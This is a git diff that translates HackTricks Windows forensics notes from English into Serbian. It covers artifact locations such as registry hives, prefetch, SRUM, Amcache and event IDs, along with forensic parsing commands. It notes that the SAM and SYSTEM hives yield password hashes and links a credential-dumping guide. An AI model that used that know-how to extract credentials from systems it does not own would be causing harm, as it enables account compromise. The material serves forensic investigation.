-The registry path `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` indicates the file that is being used.
+Putanja registra `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` ukazuje na datoteku koja se koristi.
 
-You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html).
+Možete otvoriti PST datoteku koristeći alat [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html).
 
 ![](<../../../images/image (485).png>)
 
 ### Microsoft Outlook OST Files
 
-An **OST file** is generated by Microsoft Outlook when it's configured with **IMAP** or an **Exchange** server, storing similar information to a PST file. This file is synchronized with the server, retaining data for **the last 12 months** up to a **maximum size of 50GB**, and is located in the same directory as the PST file. To view an OST file, the [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) can be utilized.
+**OST datoteka** se generiše od strane Microsoft Outlook-a kada je konfigurisan sa **IMAP** ili **Exchange** serverom, čuvajući slične informacije kao PST datoteka. Ova datoteka se sinhronizuje sa serverom, zadržavajući podatke za **poslednjih 12 meseci** do **maksimalne veličine od 50GB**, i nalazi se u istom direktorijumu kao PST datoteka. Da biste pregledali OST datoteku, može se koristiti [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html).
 
 ### Retrieving Attachments
 
-Lost attachments might be recoverable from:
+Izgubljeni dodaci mogu biti dostupni iz:
 
-- For **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
-- For **IE11 and above**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
+- Za **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
+- Za **IE11 i više**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
 
 ### Thunderbird MBOX Files
 
-**Thunderbird** utilizes **MBOX files** to store data, located at `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`.
+**Thunderbird** koristi **MBOX datoteke** za čuvanje podataka, smeštene u `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`.
 
 ### Image Thumbnails
 
-- **Windows XP and 8-8.1**: Accessing a folder with thumbnails generates a `thumbs.db` file storing image previews, even after deletion.
-- **Windows 7/10**: `thumbs.db` is created when accessed over a network via UNC path.
-- **Windows Vista and newer**: Thumbnail previews are centralized in `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` with files named **thumbcache_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) and [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) are tools for viewing these files.
+- **Windows XP i 8-8.1**: Pristup folderu sa sličicama generiše `thumbs.db` datoteku koja čuva prikaze slika, čak i nakon brisanja.
+- **Windows 7/10**: `thumbs.db` se kreira kada se pristupa preko mreže putem UNC putanje.
+- **Windows Vista i novije**: Prikazi sličica su centralizovani u `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` sa datotekama nazvanim **thumbcache_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) i [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) su alati za pregled ovih datoteka.
 
 ### Windows Registry Information
 
-The Windows Registry, storing extensive system and user activity data, is contained within files in:
+Windows Registry, koji čuva opsežne podatke o sistemu i korisničkim aktivnostima, sadrži se unutar datoteka u:
 
-- `%windir%\System32\Config` for various `HKEY_LOCAL_MACHINE` subkeys.
-- `%UserProfile%{User}\NTUSER.DAT` for `HKEY_CURRENT_USER`.
-- Windows Vista and later versions back up `HKEY_LOCAL_MACHINE` registry files in `%Windir%\System32\Config\RegBack\`.
-- Additionally, program execution information is stored in `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` from Windows Vista and Windows 2008 Server onwards.
+- `%windir%\System32\Config` za razne `HKEY_LOCAL_MACHINE` podključeve.
+- `%UserProfile%{User}\NTUSER.DAT` za `HKEY_CURRENT_USER`.
+- Windows Vista i novije verzije prave rezervne kopije `HKEY_LOCAL_MACHINE` registry datoteka u `%Windir%\System32\Config\RegBack\`.
+- Pored toga, informacije o izvršenju programa se čuvaju u `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` od Windows Vista i Windows 2008 Server nadalje.
 
 ### Tools
 
-Some tools are useful to analyze the registry files:
+Neki alati su korisni za analizu registry datoteka:
 
-- **Registry Editor**: It's installed in Windows. It's a GUI to navigate through the Windows registry of the current session.
-- [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): It allows you to load the registry file and navigate through them with a GUI. It also contains Bookmarks highlighting keys with interesting information.
-- [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Again, it has a GUI that allows to navigate through the loaded registry and also contains plugins that highlight interesting information inside the loaded registry.
-- [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Another GUI application capable of extracting the important information from the registry loaded.
+- **Registry Editor**: Instaliran je u Windows-u. To je GUI za navigaciju kroz Windows registry trenutne sesije.
+- [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): Omogućava vam da učitate registry datoteku i navigirate kroz njih sa GUI-jem. Takođe sadrži oznake koje ističu ključeve sa zanimljivim informacijama.
+- [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Takođe ima GUI koji omogućava navigaciju kroz učitani registry i sadrži dodatke koji ističu zanimljive informacije unutar učitanog registry-a.
+- [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Još jedna GUI aplikacija sposobna da izvuče važne informacije iz učitanog registry-a.
 
 ### Recovering Deleted Element
 
-When a key is deleted it's marked as such, but until the space it's occupying is needed it won't be removed. Therefore, using tools like **Registry Explorer** it's possible to recover these deleted keys.
+Kada je ključ obrisan, označen je kao takav, ali dok prostor koji zauzima nije potreban, neće biti uklonjen. Stoga, korišćenjem alata kao što je **Registry Explorer**, moguće je povratiti ove obrisane ključeve.
 
 ### Last Write Time
 
-Each Key-Value contains a **timestamp** indicating the last time it was modified.
+Svaki Key-Value sadrži **vremensku oznaku** koja označava poslednji put kada je modifikovan.
 
 ### SAM
 
-The file/hive **SAM** contains the **users, groups and users passwords** hashes of the system.
+Datoteka/hive **SAM** sadrži **korisnike, grupe i heširane lozinke korisnika** sistema.
 
-In `SAM\Domains\Account\Users` you can obtain the username, the RID, last login, last failed logon, login counter, password policy and when the account was created. To get the **hashes** you also **need** the file/hive **SYSTEM**.
+U `SAM\Domains\Account\Users` možete dobiti korisničko ime, RID, poslednju prijavu, poslednji neuspešni pokušaj prijave, brojač prijava, politiku lozinki i kada je nalog kreiran. Da biste dobili **hešove**, takođe **trebate** datoteku/hive **SYSTEM**.
 
 ### Interesting entries in the Windows Registry
 
@@ -282,233 +274,224 @@ interesting-windows-registry-keys.md
 
 ### Basic Windows Processes
 
-In [this post](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) you can learn about the common Windows processes to detect suspicious behaviours.
+U [ovom postu](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) možete saznati o uobičajenim Windows procesima za otkrivanje sumnjivih ponašanja.
 
 ### Windows Recent APPs
 
-Inside the registry `NTUSER.DAT` in the path `Software\Microsoft\Current Version\Search\RecentApps` you can subkeys with information about the **application executed**, **last time** it was executed, and **number of times** it was launched.
+Unutar registra `NTUSER.DAT` na putu `Software\Microsoft\Current Version\Search\RecentApps` možete pronaći podključeve sa informacijama o **izvršenoj aplikaciji**, **poslednjem putu** kada je izvršena, i **broju puta** kada je pokrenuta.
 
 ### BAM (Background Activity Moderator)
 
-You can open the `SYSTEM` file with a registry editor and inside the path `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` you can find the information about the **applications executed by each user** (note the `{SID}` in the path) and at **what time** they were executed (the time is inside the Data value of the registry).
+Možete otvoriti datoteku `SYSTEM` sa registry editorom i unutar puta `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` možete pronaći informacije o **aplikacijama koje je izvršio svaki korisnik** (napomena na `{SID}` u putu) i **u koje vreme** su izvršene (vreme je unutar Data vrednosti registra).
 
 ### Windows Prefetch
 
-Prefetching is a technique that allows a computer to silently **fetch the necessary resources needed to display content** that a user **might access in the near future** so resources can be accessed quicker.
+Prefetching je tehnika koja omogućava računaru da tiho **preuzme potrebne resurse potrebne za prikazivanje sadržaja** koji korisnik **može pristupiti u bliskoj budućnosti** kako bi se resursi mogli brže pristupiti.
 
-Windows prefetch consists of creating **caches of the executed programs** to be able to load them faster. These caches as created as `.pf` files inside the path: `C:\Windows\Prefetch`. There is a limit of 128 files in XP/VISTA/WIN7 and 1024 files in Win8/Win10.
+Windows prefetch se sastoji od kreiranja **kešova izvršenih programa** kako bi ih mogli brže učitati. Ovi keševi se kreiraju kao `.pf` datoteke unutar puta: `C:\Windows\Prefetch`. Postoji limit od 128 datoteka u XP/VISTA/WIN7 i 1024 datoteka u Win8/Win10.
 
-The file name is created as `{program_name}-{hash}.pf` (the hash is based on the path and arguments of the executable). In W10 these files are compressed. Do note that the sole presence of the file indicates that **the program was executed** at some point.
+Ime datoteke se kreira kao `{program_name}-{hash}.pf` (heš se zasniva na putu i argumentima izvršne datoteke). U W10 ove datoteke su kompresovane. Imajte na umu da sama prisutnost datoteke ukazuje da je **program izvršen** u nekom trenutku.
 
-The file `C:\Windows\Prefetch\Layout.ini` contains the **names of the folders of the files that are prefetched**. This file contains **information about the number of the executions**, **dates** of the execution and **files** **open** by the program.
-
-To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd):
+Datoteka `C:\Windows\Prefetch\Layout.ini` sadrži **imena foldera datoteka koje su preuzete**. Ova datoteka sadrži **informacije o broju izvršenja**, **datumima** izvršenja i **datotekama** **otvorenim** od strane programa.
 
+Da biste pregledali ove datoteke, možete koristiti alat [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd):
 ```bash
 .\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
 ```
-
 ![](<../../../images/image (487).png>)
 
 ### Superprefetch
 
-**Superprefetch** has the same goal as prefetch, **load programs faster** by predicting what is going to be loaded next. However, it doesn't substitute the prefetch service.\
-This service will generate database files in `C:\Windows\Prefetch\Ag*.db`.
+**Superprefetch** ima isti cilj kao prefetch, **brže učitavanje programa** predviđanjem šta će biti učitano sledeće. Međutim, ne zamenjuje prefetch servis.\
+Ova usluga će generisati datoteke baze podataka u `C:\Windows\Prefetch\Ag*.db`.
 
-In these databases you can find the **name** of the **program**, **number** of **executions**, **files** **opened**, **volume** **accessed**, **complete** **path**, **timeframes** and **timestamps**.
+U ovim bazama podataka možete pronaći **ime** **programa**, **broj** **izvršavanja**, **otvorene** **datoteke**, **pristup** **volumenu**, **potpunu** **putanju**, **vremenske okvire** i **vremenske oznake**.
 
-You can access this information using the tool [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/).
+Možete pristupiti ovim informacijama koristeći alat [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/).
 
 ### SRUM
 
-**System Resource Usage Monitor** (SRUM) **monitors** the **resources** **consumed** **by a process**. It appeared in W8 and it stores the data in an ESE database located in `C:\Windows\System32\sru\SRUDB.dat`.
+**Monitor korišćenja sistemskih resursa** (SRUM) **prati** **resurse** **koje koristi** **proces**. Pojavio se u W8 i čuva podatke u ESE bazi podataka smeštenoj u `C:\Windows\System32\sru\SRUDB.dat`.
 
-It gives the following information:
+Daje sledeće informacije:
 
-- AppID and Path
-- User that executed the process
-- Sent Bytes
-- Received Bytes
-- Network Interface
-- Connection duration
-- Process duration
+- AppID i Putanja
+- Korisnik koji je izvršio proces
+- Poslati bajtovi
+- Primljeni bajtovi
+- Mrežni interfejs
+- Trajanje veze
+- Trajanje procesa
 
-This information is updated every 60 mins.
-
-You can obtain the date from this file using the tool [**srum_dump**](https://github.com/MarkBaggett/srum-dump).
+Ove informacije se ažuriraju svake 60 minuta.
 
+Možete dobiti podatke iz ove datoteke koristeći alat [**srum_dump**](https://github.com/MarkBaggett/srum-dump).
 ```bash
 .\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum
 ```
-
 ### AppCompatCache (ShimCache)
 
-The **AppCompatCache**, also known as **ShimCache**, forms a part of the **Application Compatibility Database** developed by **Microsoft** to tackle application compatibility issues. This system component records various pieces of file metadata, which include:
+**AppCompatCache**, poznat i kao **ShimCache**, deo je **Baze podataka o kompatibilnosti aplikacija** koju je razvila **Microsoft** kako bi se rešili problemi sa kompatibilnošću aplikacija. Ova sistemska komponenta beleži razne delove metapodataka o datotekama, koji uključuju:
 
-- Full path of the file
-- Size of the file
-- Last Modified time under **$Standard_Information** (SI)
-- Last Updated time of the ShimCache
-- Process Execution Flag
+- Puni put do datoteke
+- Veličinu datoteke
+- Vreme poslednje izmene pod **$Standard_Information** (SI)
+- Vreme poslednje ažuriranja ShimCache-a
+- Zastavicu izvršenja procesa
 
-Such data is stored within the registry at specific locations based on the version of the operating system:
+Ovi podaci se čuvaju u registru na specifičnim lokacijama u zavisnosti od verzije operativnog sistema:
 
-- For XP, the data is stored under `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` with a capacity for 96 entries.
-- For Server 2003, as well as for Windows versions 2008, 2012, 2016, 7, 8, and 10, the storage path is `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, accommodating 512 and 1024 entries, respectively.
+- Za XP, podaci se čuvaju pod `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` sa kapacitetom za 96 unosa.
+- Za Server 2003, kao i za verzije Windows-a 2008, 2012, 2016, 7, 8 i 10, putanja za skladištenje je `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, sa kapacitetom od 512 i 1024 unosa, respektivno.
 
-To parse the stored information, the [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) is recommended for use.
+Za analizu sačuvanih informacija, preporučuje se korišćenje [**AppCompatCacheParser** alata](https://github.com/EricZimmerman/AppCompatCacheParser).
 
 ![](<../../../images/image (488).png>)
 
 ### Amcache
 
-The **Amcache.hve** file is essentially a registry hive that logs details about applications that have been executed on a system. It is typically found at `C:\Windows\AppCompat\Programas\Amcache.hve`.
+Datoteka **Amcache.hve** je u suštini registri hives koji beleži detalje o aplikacijama koje su izvršene na sistemu. Obično se nalazi na `C:\Windows\AppCompat\Programas\Amcache.hve`.
 
-This file is notable for storing records of recently executed processes, including the paths to the executable files and their SHA1 hashes. This information is invaluable for tracking the activity of applications on a system.
-
-To extract and analyze the data from **Amcache.hve**, the [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) tool can be used. The following command is an example of how to use AmcacheParser to parse the contents of the **Amcache.hve** file and output the results in CSV format:
+Ova datoteka je značajna jer čuva zapise o nedavno izvršenim procesima, uključujući putanje do izvršnih datoteka i njihove SHA1 heš vrednosti. Ove informacije su neprocenjive za praćenje aktivnosti aplikacija na sistemu.
 
+Za ekstrakciju i analizu podataka iz **Amcache.hve**, može se koristiti [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) alat. Sledeća komanda je primer kako koristiti AmcacheParser za analizu sadržaja datoteke **Amcache.hve** i izlaz rezultata u CSV formatu:
 ```bash
 AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
 ```
+Među generisanim CSV datotekama, `Amcache_Unassociated file entries` je posebno značajan zbog bogatih informacija koje pruža o neudruženim unosima datoteka.
 
-Among the generated CSV files, the `Amcache_Unassociated file entries` is particularly noteworthy due to the rich information it provides about unassociated file entries.
-
-The most interesting CVS file generated is the `Amcache_Unassociated file entries`.
+Najzanimljivija CVS datoteka koja je generisana je `Amcache_Unassociated file entries`.
 
 ### RecentFileCache
 
-This artifact can only be found in W7 in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` and it contains information about the recent execution of some binaries.
+Ovaj artefakt se može naći samo u W7 u `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` i sadrži informacije o nedavnoj izvršavanju nekih binarnih datoteka.
 
-You can use the tool [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) to parse the file.
+Možete koristiti alat [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) za analizu datoteke.
 
-### Scheduled tasks
+### Zakazane radnje
 
-You can extract them from `C:\Windows\Tasks` or `C:\Windows\System32\Tasks` and read them as XML.
+Možete ih izvući iz `C:\Windows\Tasks` ili `C:\Windows\System32\Tasks` i pročitati ih kao XML.
 
-### Services
+### Servisi
 
-You can find them in the registry under `SYSTEM\ControlSet001\Services`. You can see what is going to be executed and when.
+Možete ih pronaći u registru pod `SYSTEM\ControlSet001\Services`. Možete videti šta će biti izvršeno i kada.
 
 ### **Windows Store**
 
-The installed applications can be found in `\ProgramData\Microsoft\Windows\AppRepository\`\
-This repository has a **log** with **each application installed** in the system inside the database **`StateRepository-Machine.srd`**.
+Instalirane aplikacije se mogu naći u `\ProgramData\Microsoft\Windows\AppRepository\`\
+Ova repozitorija ima **log** sa **svakom instaliranom** aplikacijom u sistemu unutar baze podataka **`StateRepository-Machine.srd`**.
 
-Inside the Application table of this database, it's possible to find the columns: "Application ID", "PackageNumber", and "Display Name". These columns have information about pre-installed and installed applications and it can be found if some applications were uninstalled because the IDs of installed applications should be sequential.
+Unutar tabele aplikacija ove baze podataka, moguće je pronaći kolone: "Application ID", "PackageNumber" i "Display Name". Ove kolone sadrže informacije o unapred instaliranim i instaliranim aplikacijama i može se utvrditi da li su neke aplikacije deinstalirane jer bi ID-ovi instaliranih aplikacija trebali biti sekvencijalni.
 
-It's also possible to **find installed application** inside the registry path: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
-And **uninstalled** **applications** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
+Takođe je moguće **pronaći instaliranu aplikaciju** unutar registra na putu: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
+I **deinstalirane** **aplikacije** u: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
 
-## Windows Events
+## Windows događaji
 
-Information that appears inside Windows events are:
+Informacije koje se pojavljuju unutar Windows događaja su:
 
-- What happened
-- Timestamp (UTC + 0)
-- Users involved
-- Hosts involved (hostname, IP)
-- Assets accessed (files, folder, printer, services)
+- Šta se desilo
+- Vreme (UTC + 0)
+- Uključeni korisnici
+- Uključeni hostovi (hostname, IP)
+- Pristupeni resursi (datoteke, folderi, štampači, servisi)
 
-The logs are located in `C:\Windows\System32\config` before Windows Vista and in `C:\Windows\System32\winevt\Logs` after Windows Vista. Before Windows Vista, the event logs were in binary format and after it, they are in **XML format** and use the **.evtx** extension.
+Logovi se nalaze u `C:\Windows\System32\config` pre Windows Vista i u `C:\Windows\System32\winevt\Logs` posle Windows Vista. Pre Windows Vista, logovi događaja su bili u binarnom formatu, a posle toga su u **XML formatu** i koriste **.evtx** ekstenziju.
 
-The location of the event files can be found in the SYSTEM registry in **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
+Lokacija datoteka događaja može se pronaći u SYSTEM registru u **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
 
-They can be visualized from the Windows Event Viewer (**`eventvwr.msc`**) or with other tools like [**Event Log Explorer**](https://eventlogxp.com) **or** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
+Mogu se vizualizovati iz Windows Event Viewer-a (**`eventvwr.msc`**) ili sa drugim alatima kao što su [**Event Log Explorer**](https://eventlogxp.com) **ili** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
 
-## Understanding Windows Security Event Logging
+## Razumevanje Windows sigurnosnog logovanja događaja
 
-Access events are recorded in the security configuration file located at `C:\Windows\System32\winevt\Security.evtx`. This file's size is adjustable, and when its capacity is reached, older events are overwritten. Recorded events include user logins and logoffs, user actions, and changes to security settings, as well as file, folder, and shared asset access.
+Događaji pristupa se beleže u datoteci sigurnosne konfiguracije koja se nalazi na `C:\Windows\System32\winevt\Security.evtx`. Veličina ove datoteke je prilagodljiva, a kada se dostigne njena kapacitet, stariji događaji se prepisuju. Beleženi događaji uključuju prijave i odjave korisnika, korisničke akcije i promene u sigurnosnim postavkama, kao i pristup datotekama, folderima i zajedničkim resursima.
 
-### Key Event IDs for User Authentication:
+### Ključni ID-evi događaja za autentifikaciju korisnika:
 
-- **EventID 4624**: Indicates a user successfully authenticated.
-- **EventID 4625**: Signals an authentication failure.
-- **EventIDs 4634/4647**: Represent user logoff events.
-- **EventID 4672**: Denotes login with administrative privileges.
+- **EventID 4624**: Ukazuje na uspešnu autentifikaciju korisnika.
+- **EventID 4625**: Signalizira neuspeh autentifikacije.
+- **EventIDs 4634/4647**: Predstavljaju događaje odjave korisnika.
+- **EventID 4672**: Označava prijavu sa administratorskim privilegijama.
 
-#### Sub-types within EventID 4634/4647:
+#### Podtipovi unutar EventID 4634/4647:
 
-- **Interactive (2)**: Direct user login.
-- **Network (3)**: Access to shared folders.
-- **Batch (4)**: Execution of batch processes.
-- **Service (5)**: Service launches.
-- **Proxy (6)**: Proxy authentication.
-- **Unlock (7)**: Screen unlocked with a password.
-- **Network Cleartext (8)**: Clear text password transmission, often from IIS.
-- **New Credentials (9)**: Usage of different credentials for access.
-- **Remote Interactive (10)**: Remote desktop or terminal services login.
-- **Cache Interactive (11)**: Login with cached credentials without domain controller contact.
-- **Cache Remote Interactive (12)**: Remote login with cached credentials.
-- **Cached Unlock (13)**: Unlocking with cached credentials.
+- **Interaktivno (2)**: Direktna prijava korisnika.
+- **Mrežno (3)**: Pristup zajedničkim folderima.
+- **Serijski (4)**: Izvršenje serijskih procesa.
+- **Servis (5)**: Pokretanje servisa.
+- **Proxy (6)**: Proxy autentifikacija.
+- **Otključavanje (7)**: Ekran otključan lozinkom.
+- **Mrežni čisti tekst (8)**: Prenos lozinke u čistom tekstu, često iz IIS-a.
+- **Nove kredencijale (9)**: Korišćenje različitih kredencijala za pristup.
+- **Daljinsko interaktivno (10)**: Prijava putem daljinske radne površine ili terminalskih usluga.
+- **Keširano interaktivno (11)**: Prijava sa keširanim kredencijalima bez kontakta sa kontrolerom domena.
+- **Keširano daljinsko interaktivno (12)**: Daljinska prijava sa keširanim kredencijalima.
+- **Keširano otključavanje (13)**: Otključavanje sa keširanim kredencijalima.
 
-#### Status and Sub Status Codes for EventID 4625:
+#### Status i podstatus kodovi za EventID 4625:
 
-- **0xC0000064**: User name does not exist - Could indicate a username enumeration attack.
-- **0xC000006A**: Correct user name but wrong password - Possible password guessing or brute-force attempt.
-- **0xC0000234**: User account locked out - May follow a brute-force attack resulting in multiple failed logins.
-- **0xC0000072**: Account disabled - Unauthorized attempts to access disabled accounts.
-- **0xC000006F**: Logon outside allowed time - Indicates attempts to access outside of set login hours, a possible sign of unauthorized access.
-- **0xC0000070**: Violation of workstation restrictions - Could be an attempt to login from an unauthorized location.
-- **0xC0000193**: Account expiration - Access attempts with expired user accounts.
-- **0xC0000071**: Expired password - Login attempts with outdated passwords.
-- **0xC0000133**: Time sync issues - Large time discrepancies between client and server may be indicative of more sophisticated attacks like pass-the-ticket.
-- **0xC0000224**: Mandatory password change required - Frequent mandatory changes might suggest an attempt to destabilize account security.
-- **0xC0000225**: Indicates a system bug rather than a security issue.
-- **0xC000015b**: Denied logon type - Access attempt with unauthorized logon type, such as a user trying to execute a service logon.
+- **0xC0000064**: Korisničko ime ne postoji - Može ukazivati na napad na enumeraciju korisničkog imena.
+- **0xC000006A**: Tačno korisničko ime, ali pogrešna lozinka - Mogući pokušaj pogađanja lozinke ili brute-force napad.
+- **0xC0000234**: Korisnički nalog je zaključan - Može uslediti nakon brute-force napada koji rezultira višestrukim neuspelim prijavama.
+- **0xC0000072**: Nalog onemogućen - Neovlašćeni pokušaji pristupa onemogućenim nalozima.
+- **0xC000006F**: Prijava van dozvoljenog vremena - Ukazuje na pokušaje pristupa van postavljenih sati prijave, mogući znak neovlašćenog pristupa.
+- **0xC0000070**: Kršenje ograničenja radne stanice - Može biti pokušaj prijave sa neovlašćenog mesta.
+- **0xC0000193**: Istek naloga - Pokušaji pristupa sa isteklim korisničkim nalozima.
+- **0xC0000071**: Istekla lozinka - Pokušaji prijave sa zastarelim lozinkama.
+- **0xC0000133**: Problemi sa sinhronizacijom vremena - Velike vremenske razlike između klijenta i servera mogu ukazivati na sofisticiranije napade poput pass-the-ticket.
+- **0xC0000224**: Obavezna promena lozinke potrebna - Česte obavezne promene mogu sugerisati pokušaj destabilizacije sigurnosti naloga.
+- **0xC0000225**: Ukazuje na grešku u sistemu, a ne na sigurnosni problem.
+- **0xC000015b**: Odbijeni tip prijave - Pokušaj pristupa sa neovlašćenim tipom prijave, kao što je korisnik koji pokušava da izvrši prijavu servisa.
 
 #### EventID 4616:
 
-- **Time Change**: Modification of the system time, could obscure the timeline of events.
+- **Promena vremena**: Izmena sistemskog vremena, može zamagliti hronologiju događaja.
 
-#### EventID 6005 and 6006:
+#### EventID 6005 i 6006:
 
-- **System Startup and Shutdown**: EventID 6005 indicates the system starting up, while EventID 6006 marks it shutting down.
+- **Pokretanje i gašenje sistema**: EventID 6005 označava pokretanje sistema, dok EventID 6006 označava gašenje.
 
 #### EventID 1102:
 
-- **Log Deletion**: Security logs being cleared, which is often a red flag for covering up illicit activities.
+- **Brisanje logova**: Brisanje sigurnosnih logova, što je često znak za prikrivanje nelegalnih aktivnosti.
 
-#### EventIDs for USB Device Tracking:
+#### EventIDs za praćenje USB uređaja:
 
-- **20001 / 20003 / 10000**: USB device first connection.
-- **10100**: USB driver update.
-- **EventID 112**: Time of USB device insertion.
+- **20001 / 20003 / 10000**: Prva konekcija USB uređaja.
+- **10100**: Ažuriranje USB drajvera.
+- **EventID 112**: Vreme umetanja USB uređaja.
 
-For practical examples on simulating these login types and credential dumping opportunities, refer to [Altered Security's detailed guide](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them).
+Za praktične primere simulacije ovih tipova prijava i mogućnosti iskopavanja kredencijala, pogledajte [detaljni vodič Altered Security](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them).
 
-Event details, including status and sub-status codes, provide further insights into event causes, particularly notable in Event ID 4625.
+Detalji događaja, uključujući status i podstatus kodove, pružaju dodatne uvide u uzroke događaja, posebno u Event ID 4625.
 
-### Recovering Windows Events
+### Oporavak Windows događaja
 
-To enhance the chances of recovering deleted Windows Events, it's advisable to power down the suspect computer by directly unplugging it. **Bulk_extractor**, a recovery tool specifying the `.evtx` extension, is recommended for attempting to recover such events.
+Da biste povećali šanse za oporavak obrisanih Windows događaja, preporučuje se da isključite sumnjivi računar direktnim isključivanjem. **Bulk_extractor**, alat za oporavak koji specificira ekstenziju `.evtx`, se preporučuje za pokušaj oporavka takvih događaja.
 
-### Identifying Common Attacks via Windows Events
+### Identifikacija uobičajenih napada putem Windows događaja
 
-For a comprehensive guide on utilizing Windows Event IDs in identifying common cyber attacks, visit [Red Team Recipe](https://redteamrecipe.com/event-codes/).
+Za sveobuhvatan vodič o korišćenju Windows Event ID-ova u identifikaciji uobičajenih sajber napada, posetite [Red Team Recipe](https://redteamrecipe.com/event-codes/).
 
-#### Brute Force Attacks
+#### Brute Force napadi
 
-Identifiable by multiple EventID 4625 records, followed by an EventID 4624 if the attack succeeds.
+Identifikovani višestrukim zapisima EventID 4625, praćenim EventID 4624 ako napad uspe.
 
-#### Time Change
+#### Promena vremena
 
-Recorded by EventID 4616, changes to system time can complicate forensic analysis.
+Zabeležena sa EventID 4616, promene u sistemskom vremenu mogu otežati forenzičku analizu.
 
-#### USB Device Tracking
+#### Praćenje USB uređaja
 
-Useful System EventIDs for USB device tracking include 20001/20003/10000 for initial use, 10100 for driver updates, and EventID 112 from DeviceSetupManager for insertion timestamps.
+Korisni sistemski EventID-ovi za praćenje USB uređaja uključuju 20001/20003/10000 za početnu upotrebu, 10100 za ažuriranja drajvera i EventID 112 iz DeviceSetupManager-a za vremenske oznake umetanja.
 
-#### System Power Events
+#### Događaji napajanja sistema
 
-EventID 6005 indicates system startup, while EventID 6006 marks shutdown.
+EventID 6005 označava pokretanje sistema, dok EventID 6006 označava gašenje.
 
-#### Log Deletion
+#### Brisanje logova
 
-Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis.
+Sigurnosni EventID 1102 signalizira brisanje logova, što je kritičan događaj za forenzičku analizu.
 
-

-
-{% embed url="https://websec.nl/" %}
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
index 840b910bc..2f0d6d4cd 100644
--- a/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
+++ b/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
@@ -1,101 +1,101 @@
-# Interesting Windows Registry Keys
+# Zanimljive Windows Registry Ključevi
 
-### Interesting Windows Registry Keys
+### Zanimljive Windows Registry Ključevi
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### **Windows Version and Owner Info**
+### **Informacije o verziji Windows-a i vlasniku**
 
-- Located at **`Software\Microsoft\Windows NT\CurrentVersion`**, you'll find the Windows version, Service Pack, installation time, and the registered owner's name in a straightforward manner.
